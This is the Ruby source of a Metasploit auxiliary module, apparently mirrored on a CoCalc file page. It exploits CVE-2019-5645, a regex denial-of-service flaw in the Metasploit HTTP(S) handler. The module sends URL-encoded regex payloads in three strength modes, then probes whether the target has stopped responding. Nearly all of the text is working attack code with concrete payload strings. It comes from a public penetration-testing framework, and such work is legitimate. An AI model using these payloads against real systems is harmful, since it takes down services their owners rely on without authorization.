CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Dos89def initialize(info = {})10super(update_info(info,11'Name' => 'Metasploit HTTP(S) handler DoS',12'Description' => %q{13This module exploits the Metasploit HTTP(S) handler by sending14a specially crafted HTTP request that gets added as a resource handler.15Resources (which come from the external connections) are evaluated as RegEx16in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS.1718Tested against Metasploit 5.0.20.19},20'Author' => [21'Jose Garduno, Dreamlab Technologies AG', #Vulnerability Discovery, Metasploit module.22'Angelo Seiler, Dreamlab Technologies AG', #Additional research, debugging.23],24'License' => MSF_LICENSE,25'References' => [26['CVE', '2019-5645']27],28'DisclosureDate' => '2019-09-04'29))3031register_options(32[33OptEnum.new('DOSTYPE', [true, 'Type of DoS to trigger', 'HARD', %w[GENTLE SOFT HARD]])34])35end3637def test_service_unresponsive38begin39print_status('Testing for service unresponsiveness.')4041res = send_request_cgi({42'uri' => '/' + Rex::Text.rand_text_alpha(8),43'method' => 'GET'44})4546if res.nil?47print_good('SUCCESS, Service not responding.')48else49print_error('Service responded with a valid HTTP Response; Attack failed.')50end51rescue ::Rex::ConnectionRefused52print_error('An unknown error occurred.')53rescue ::Timeout::Error54print_good('HTTP request timed out, most likely the ReDoS attack was successful.')55end56end575859def dos60case datastore['DOSTYPE']61when "HARD"62resone = send_request_cgi(63'method' => 'GET',64'uri' => normalize_uri("/%2f%26%28%21%7c%23%2b%29%2b%40%32%30")65)66begin67restwo = send_request_cgi(68'method' => 'GET',69'uri' => normalize_uri("/%26%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%21")70)71rescue ::Errno::EPIPE, ::Timeout::Error72# Same exceptions the HttpClient mixin catches73end74test_service_unresponsive7576when "SOFT"77resone = send_request_cgi(78'method' => 'GET',79'uri' => normalize_uri("/%5b20")80)8182test_service_unresponsive8384when "GENTLE"85resone = send_request_cgi(86'method' => 'GET',87'uri' => normalize_uri("/%2e%2a%7c%32%30%7c%5c")88)8990sleep(1)9192restwo = send_request_cgi(93'method' => 'GET',94'uri' => normalize_uri("/whatever")95)9697resthree = send_request_cgi(98'method' => 'GET',99'uri' => normalize_uri("/whatever2")100)101102if resthree.body.length == 0103print_good('SUCCESS, Service not responding.')104else105print_error('Service responded with a valid HTTP Response; Attack failed.')106end107108else109fail_with Failure::BadConfig, 'Invalid DOSTYPE selected'110end111112print_status("DOS request sent")113end114115def is_alive?116begin117connect118rescue Rex::ConnectionRefused119return false120ensure121disconnect122end123true124end125126def run127print_status("#{rhost}:#{rport} - Sending DoS packet...")128dos129end130131end132133134